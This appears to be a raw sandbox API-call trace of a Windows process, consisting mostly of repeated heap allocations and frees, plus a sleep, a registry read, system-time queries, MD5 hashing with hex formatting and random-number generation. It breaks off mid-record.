[0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.081] GetProcessHeap () returned 0xe30000 [0114.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.081] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0114.082] GetProcessHeap () returned 0xe30000 [0114.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0114.082] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0114.083] GetProcessHeap () returned 0xe30000 [0114.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0114.083] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.084] GetProcessHeap () returned 0xe30000 [0114.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0114.084] GetProcessHeap () returned 0xe30000 [0114.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0114.085] GetProcessHeap () returned 0xe30000 [0114.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0114.086] GetProcessHeap () returned 0xe30000 [0114.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0114.086] GetProcessHeap () returned 0xe30000 [0114.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0114.086] GetProcessHeap () returned 0xe30000 [0114.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2bbc8 | out: hHeap=0xe30000) returned 1 [0114.086] GetProcessHeap () returned 0xe30000 [0114.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0114.086] Sleep (dwMilliseconds=0xea60) [0124.096] GetTickCount () returned 0x11788ba [0124.096] GetProcessHeap () returned 0xe30000 [0124.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0124.097] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x795e97c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x795e97c*=0x3d8) returned 0x0 [0124.099] GetProcessHeap () returned 0xe30000 [0124.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0124.099] GetTickCount () returned 0x11788ba [0124.099] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0124.099] GetCurrentProcess () returned 0xffffffff [0124.100] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0124.100] CryptAcquireContextA (in: phProv=0x795e978, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e978*=0xed46f0) returned 1 [0124.100] CryptCreateHash (in: hProv=0xed46f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x795e97c | out: phHash=0x795e97c) returned 1 [0124.100] CryptHashData (hHash=0xec1cf0, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0124.100] CryptGetHashParam (in: hHash=0xec1cf0, dwParam=0x4, pbData=0x795e974, pdwDataLen=0x795e970, dwFlags=0x0 | out: pbData=0x795e974, pdwDataLen=0x795e970) returned 1 [0124.100] CryptGetHashParam (in: hHash=0xec1cf0, dwParam=0x2, pbData=0x795e998, pdwDataLen=0x795e974, dwFlags=0x0 | out: pbData=0x795e998, pdwDataLen=0x795e974) returned 1 [0124.100] CryptDestroyHash (hHash=0xec1cf0) returned 1 [0124.100] CryptReleaseContext (hProv=0xed46f0, dwFlags=0x0) returned 1 [0124.100] GetProcessHeap () returned 0xe30000 [0124.100] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0124.100] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="33") returned 2 [0124.100] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="83") returned 2 [0124.100] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="9f") returned 2 [0124.100] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="b9") returned 2 [0124.100] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="45") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="0c") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="5d") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="1b") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="b3") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="6b") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="6d") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="b0") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="30") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="98") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="d7") returned 2 [0124.101] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="3d") returned 2 [0124.101] CryptAcquireContextW (in: phProv=0x795e6fc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e6fc*=0xed4cc8) returned 1 [0124.101] CryptGenRandom (in: hProv=0xed4cc8, dwLen=0x80, pbBuffer=0x795e710 | out: pbBuffer=0x795e710) returned 1 [0124.101] CryptReleaseContext (hProv=0xed4cc8, dwFlags=0x0) returned 1 [0124.101] GetProcessHeap () returned 0xe30000 [0124.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2c0d8 [0124.101] GetProcessHeap () returned 0xe30000 [0124.101] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6825728 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b430 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811b10 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b430 | out: hHeap=0xe30000) returned 1 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811db8 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x68254e8 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6874278 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2be50 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0xed90d0 [0124.102] GetProcessHeap () returned 0xe30000 [0124.102] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f1c8 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6812060 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2be50 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xef3600 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6812060 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f980 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x6812060 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9f980 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed39f8 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6812060 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.103] GetProcessHeap () returned 0xe30000 [0124.103] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.104] GetProcessHeap () returned 0xe30000 [0124.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.104] GetProcessHeap () returned 0xe30000 [0124.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.104] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.105] GetProcessHeap () returned 0xe30000 [0124.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.105] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, 